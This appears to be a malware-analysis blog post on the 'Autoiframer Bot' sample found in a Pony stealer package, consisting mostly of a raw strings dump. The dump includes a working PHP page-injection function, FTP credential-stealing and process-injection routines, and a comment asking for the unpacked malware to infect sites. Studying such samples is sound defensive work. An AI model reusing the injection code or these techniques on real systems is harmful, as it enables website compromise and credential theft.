Pony Gate:
Pony admin login:
s.exe inside pony package is Autoiframer Bot, Version 1.0
here some strings from the sample:
File: ZR1.exe Size: 193552 Bytes MD5: A889A2ADAFEFF5A16AFF93DD668B763C Packer: File not found C:peid.exe File Properties: CompanyName FileDescription FileVersion InternalName LegalCopyright OriginalFilename ProductName ProductVersion Exploit Signatures: --------------------------------------------------------------------------- Scanning for 19 signatures Scan Complete: 212Kb in 0,016 seconds Urls -------------------------------------------------- MiscHTTP.cpp:HTTP::DownloadString-> http://ftp:// sftp:// RegKeys -------------------------------------------------- SOFTWAREZR1 >SOFTWAREZR1 ExeRefs -------------------------------------------------- File: ZR1_dmp.exe_ dwm.exe conhost.exe dbgview.exe taskhost.exe csrss.exe lsass.exe winlogon.exe smss.exe svchost.exe services.exe ZR1.exe marrageZR1.exe Raw Strings: -------------------------------------------------- File: ZR1_dmp.exe_ MD5: a23c21b459298e70ba939155b8c194f1 Size: 217090 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. Rich .text `.rdata @.data .rsrc @.reloc SVW3 Ph(|A hH|A h(|A u0h|A h(|A WWWh D$8$}A D$<@}A D$@T}A D$Dh}A ;D$( D$ P D$XPh D$ P D$XPj: T$,# hEIo t&9N t!9N 9N(t QQQQh(~A 5lPA h@~A hP~A hX~A hx~A PhX~A YYPh |tOh =tPA 5<QA D$ SP u:hT S<Uu G<Iu ;<Cu D$ h YYSW D$ h j@X; GBSP <3@u j@X; j@X; G@_^[] =tPA HPQj SVWjL 9|t.h j@X; =tPA 5<QA HC;] PWWWWWWW YY_^[ t[Wh QSWj N WQ (VWj hj-@ u<hL YY_^ u,WV U Ph t8ht E(_^[ h37@ YYhH YYhl hB6@ YYh| h^3@ YY_^[ QQj@Rj Af;M Af;H tKPPj@Sj Bf;P VWj@h F 9^$t 9^(t uDh z;h[ @P+E tS9M tSSW hKK@ hbK@ =tPA YYj@3 t?VWS WWW3 CSh@ Vj$j G@PW H@WQP SVWh G,Ph YY9E =tPA H@VQP YYu=hx =tPA =hPA YY_^[ PSSj PSSj jD^V PSSSSSSS X_^[ PVWS 1RZtAhp xSVW [^;E QSVW3 =lPA SVW3 <1=uq 5lPA D$*P 5lPA D$$h DD,P D$0Ph D$2P D$$h DD,P D$0Ph C;$ SVWw wqtc= t==% t*=& wmtb VVVVh VVjPh VVhH @_^[ =lPA @[_^ AG;} 5hPA YY_[ QVWj SVWh YYt4h YYSV %33331 33331 ][_^ ][_^ 33331 33331 _^][ 33331 33331 _^][ USVW WVWV L$8Q D$4PS _^[] USVW WVWV D$8P D$8P D$8PS _^[] ^[_3 woVW tR:Q t<:Q t&:Q @FA; SW3 =L1B =L1B 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Communication.cpp:ProcessIframeCommand-> %s%s next credential Communication.cpp:CommandHandler-> ftp:// sftp:// Communication.cpp:DecodeFile-> Communication.cpp:ProcessUploadCommand-> Communication.cpp:SendPassword-> Communication.cpp:ProcessDownloadCommand-> Communication.cpp:ProcessCheckCommand-> CreateProcessW GrabberCreateProcess Hook.cpp:Hook_CreateProcess-> GrabberCreateProce ss Hook.cpp:DisplayInfo-> GrabberCreateProcess Hook.cpp:Hooked_CreateProcessW-> GrabberDNS.cpp:Hook_DNS-> DnsQuery_W getaddrinfo GetAddrInfoW gethostbyname GrabberDNS.cpp:Hooked_gethostbyname-> GrabberDNS.cpp:ParseADDRINFO-> %s exists GrabberDNS.cpp:Hooked_GetAddrInfoW-> GrabberDNS.cpp:Hooked_getaddrinfo-> GrabberDNS.cpp:Hooked_DnsQuery_W-> GrabberDNS.cpp:GetDomainName-> %s not found GrabberHook.cpp:DetourCreateInternal-> GrabberInject.cpp:Inject::CreateRemoteData-> GrabberInject.cpp:Inject::CreateThreadInRemoteProcess-> GrabberInject.cpp:Inject::Run-> GrabberInject.cpp:Inject::ProcessImport-> GrabberWinsock.cpp:HookWS2_32-> closesocket connect send USER anonymous PASS GrabberWinsock.cpp:Hooked_send-> GrabberWinsock.cpp:AddToSocketList-> &check[%i]=%i <?php function abc_ZR1($buffer) $Script = <<<EOS EOS; // inline scripts if(strpos($buffer, '<script') !== false) // Find script $Pos = strpos($buffer, '<script'); // Find start while($buffer[$Pos] != '>') $Pos++; $Pos += strlen('>'); // Replace return substr($buffer, 0, $Pos) . (chr(13) . chr(10)) . $Script . substr($buffer, $Pos); // Before </head> if(strpos($buffer, '</head>') !== false) $Pos = strpos($buffer, '</head>'); $Script = '<script>' . (chr(13) . chr(10)) . $Script . (chr(13) . chr(10)) . '</script>'; // Replace return substr($buffer, 0, $Pos) . $Script . substr($buffer, $Pos); // Lucky bastard! (Though you should think about your site layout. It's horrible. And users love scripts, really!) return $buffer . '<!--I will be back-->'; ob_start("abc_ZR1"); u:projectszr1autoiframer botautoiframer botiframer & uploader..MiscWininetFTPWrapper.h:WininetFTPWrapper::Upload-> u:projectszr1autoiframer botautoiframer botiframer & uploader..MiscWininetFTPWrapper.h:WininetFTPWrapper::ExtendedError-> Iframer & UploaderIframer.cpp:IframeHost-> public_html html htdocs forum board </head> <script type="text/javascript"> </script> %s%s Iframer & UploaderIframer.cpp:InfectHTMLPage-> Iframer & UploaderIframer.cpp:IFramerCallback-> index.html index.htm index.php default.aspx index.cshtml index.vbhtml Site.master <?php &iframe[%s]=%i|%s/%s &iframe[%s]=%i|%s%s%s Iframer & UploaderUploader.cpp:UploadFileToFTP-> Iframer & UploaderUploader.cpp:UploaderCallback-> &upload[%i]=%i-%s/%s &upload[%i]=%i-%s/%s/ Iframer & UploaderUploader.cpp:ManageUpload-> Install.cpp:UnInstall-> Install.cpp:Install-> Install.cpp:IsLegitimate-> T`00P V++} L&&jl66Z~??A Oh44Q sb11S* RF##e &N''i X,,t4 v;;M R)){ >^//q ,@ ` r99K f33U x<<D% p88H uB!!c z==G D""fT**~; ;d22Vt::N H$$l Cn77Y J%%o..r8 |>>Bq j55_ P((x Z--w P`00 gg}V++ jL&&Zl66A~?? h44 Sb11?* eF##^ iN'' tX,,.4 RRMv;;a {R))> q^// `@ Kr99 MMUf33 PPDx<< Hp88 cB!!0 DD9. ~~Gz== ]]+2 fD""~T** Vd22Nt:: lH$$ Yn77 xxoJ%%r..$8 tt!> ppB|>> aa_j55 UUxP((z wZ-- 0P`0 g+}V+ &jL&6Zl6?A~? 4h4 1Sb1 #eF# 'iN' ,tX, R;Mv; ){R) /q^/ `@ 9Kr9J M3Uf3 P<Dx< 8Hp8 !cB! ~=Gz=d "fD"*~T* 2Vd2:Nt: $lH$ 7Yn7m x%oJ%.r. p>B|> a5_j5W U(xP( -wZ- 00P` ++}V =&&jL66Zl??A~ 44h 11Sb ##eF ''iN ,,tX -6nn ;;Mv })){R //q^ `@ g99KrJJ 33Uf <<Dx !88Hp !!cB ==Gzdd +2ss ""fD**~T 22Vd::Nt $$lH 77Ynmm %%oJ..r !>KK >>B| 55_jWW 3"ii ((xP )--wZ P~AeS -Xt! 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Error parsing CDATA. Error null (0) or unexpected EOF found in input stream. Error document empty. Error parsing Declaration. Error parsing Comment. Error parsing Unknown. Error reading end tag. Error: empty tag. Error reading Attributes. Error reading Element value. Failed to read Element name Error parsing Element. Failed to open file Error No error ' " > < & Remote.cpp:InitalizeInRemoteProcess-> Remote.cpp:Hooked_TypeLoadLibrary-> LoadLibraryW RSDSS U:projectsZR1Autoiframer BotAutoiframer Bot.pdb URLDownloadToFileA urlmon.dll DnsQuery_A DnsFree DNSAPI.dll InternetCloseHandle InternetOpenA InternetConnectA FtpFindFirstFileA InternetFindNextFileA FtpGetCurrentDirectoryA FtpSetCurrentDirectoryA FtpOpenFileA InternetWriteFile FtpGetFileSize InternetReadFile InternetGetLastResponseInfoW FtpCreateDirectoryA InternetConnectW HttpOpenRequestW HttpSendRequestA WININET.dll PathStripPathA PathRemoveExtensionA PathAppendA PathAppendW StrStrIW SHLWAPI.dll WSAAddressToStringA WS2_32.dll GetLastError lstrlenW HeapAlloc GetProcessHeap SetUnhandledExceptionFilter GetModuleFileNameW GetModuleHandleW CreateThread Sleep GetCurrentProcessId CreateToolhelp32Snapshot Process32FirstW CloseHandle lstrcmpW WaitForSingleObject Process32NextW LoadLibraryW HeapFree VirtualFree HeapReAlloc GetModuleFileNameA GetTempPathA GetTickCount CreateProcessA ResumeThread WideCharToMultiByte GetProcAddress VirtualAlloc VirtualProtect DeleteFileW CreateFileW GetFileSize ReadFile WriteFile lstrcpyW CreateProcessW OutputDebugStringA GetTempPathW lstrcatW OutputDebugStringW SetFilePointer GetSystemTime VirtualQuery LocalAlloc MultiByteToWideChar KERNEL32.dll wsprintfW wsprintfA USER32.dll RegDeleteKeyW RegOpenKeyExA RegQueryValueExA RegCloseKey RegCreateKeyExW RegSetValueExW ADVAPI32.dll SHGetFolderPathW SHELL32.dll DecodePointer EncodePointer GetCommandLineW HeapSetInformation GetStartupInfoW ExitProcess GetStdHandle HeapCreate UnhandledExceptionFilter IsDebuggerPresent TerminateProcess GetCurrentProcess GetCPInfo InterlockedIncrement InterlockedDecrement GetACP GetOEMCP IsValidCodePage TlsAlloc TlsGetValue TlsSetValue TlsFree SetLastError GetCurrentThreadId LCMapStringW IsProcessorFeaturePresent EnterCriticalSection LeaveCriticalSection InitializeCriticalSectionAndSpinCount RtlUnwind SetHandleCount GetFileType DeleteCriticalSection FreeEnvironmentStringsW GetEnvironmentStringsW QueryPerformanceCounter GetSystemTimeAsFileTime GetConsoleCP GetConsoleMode GetStringTypeW HeapSize SetStdHandle WriteConsoleW FlushFileBuffers abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ kU'9 HMXB ?Zd; ?/L[ S;uD z?aUY D?$? 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It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more t han once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data R6010 - abort() has been called R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point support not loaded AMicrosoft Visual C++ Runtime Library <program name unknown> Runtime Error! Program: (null) HH:mm:ss dddd, MMMM dd, yyyy MM/dd/yy December November October September August July June April March February January Saturday Friday Thursday Wednesday Tuesday Monday Sunday nKERNEL32.DLL WUSER32.DLL ((((( H h(((( H H BCONOUT$ %s: x%x %s: %i Install Installed Die reverser die Process32First dwm.exe conhost.exe dbgview.exe taskhost.exe csrss.exe lsass.exe winlogon.exe smss.exe svchost.exe services.exe NT_ERROR(xNtOpenProcess(...)) wininet.dll http:// %s%s%s heapallc |heapalloc 2 strstr() ------ bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa credentials done files done NumberOfFTPAccounts Port Uninstall CreateProcess Yipiee kay yeah motherfuckr kernel32.dll No process hook for me Create suspended Own _gRemoteData Own Base success Entered Dnsapi Dnsapi.dll Original_DnsQuery_W !Original_DnsQuery_W Ws2_32 oWs2_32.dll Original_getaddrinfo !Original_getaddrinfo Original_GetAddrInfoW !Original_GetAddrInfoW numberOfResults >numberOfIPs >curr Trampoline >xNtAllocateVirtualMemory remoteStruct Write path Cannot write remotedata ? !currentPE SizeOfImage allocate temp space to reloc copy bot to temp space alloc in remote process New Base Rebase/Import tempCopyPEHeader->OptionalHeader.SizeOfImage dwWritten Difference VPEx Nothing to start? No Imports I think I can steal from you and just walk away. 0YEEAAH WHAAAT? FtpOpenFile Write failed Couldn't connect or logn upload Is domain @ASPX HTML Is file backup dir change to DirectoryFound Couldn't create Couldn't change to Deleting Botfile >SOFTWAREZR1 Deleting registry info <MAIN> No reg ZR1.exe CreateFile Done Wrong encryptionkey Modified Wron path debug Dec 24 2012.txt temp? InstructionsToDissassemble StartFaultAddress ASLR is no problem in that case. Or is it? gPOST dwBytesAvailable Download - HeapAlloc - BytesAvailable Download - HeapAlloc - GetLastError() dwBytesRead alloc list elem Fail value ws2_32.dll C:Documents and SettingsxxxMenu D marrerProgrammesD marrageZR1.exe &File iE&xit &Help h&About ... About Autoiframer Bot MS Shell Dlg Autoiframer Bot, Version 1.0 Copyright (C) 2012 Autoiframer Bot AUTOIFRAMERBOT
The mesage for reversers:
Die reverser die
hosting infos:
Anonymous - December 28, 2012 at 5:04 am
can you send me the unpacked iframer? seems interesting but I can't seem to get it to infect. ty pig